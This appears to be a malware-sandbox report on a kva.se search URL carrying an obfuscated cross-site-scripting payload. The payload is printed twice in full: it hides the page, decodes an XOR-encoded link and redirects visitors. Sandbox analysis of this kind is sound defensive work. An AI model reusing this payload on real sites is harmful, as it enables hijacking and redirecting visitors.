General

  • Target

    https://www.kva.se/?s=%%22%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get=%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60.fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef=url.map(value=%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()%2A%2F%60;codeString=codeString.replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep.over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max.do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;%3E%3C%2Fspan%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder.setElementByCode(socar~ar)

  • Sample

    240222-wzvheaea68

Malware Config

Targets

    • Target

      https://www.kva.se/?s=%%22%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get=%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60.fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef=url.map(value=%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()%2A%2F%60;codeString=codeString.replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep.over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max.do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;%3E%3C%2Fspan%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder.setElementByCode(socar~ar)

    Score
    1/10

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Tasks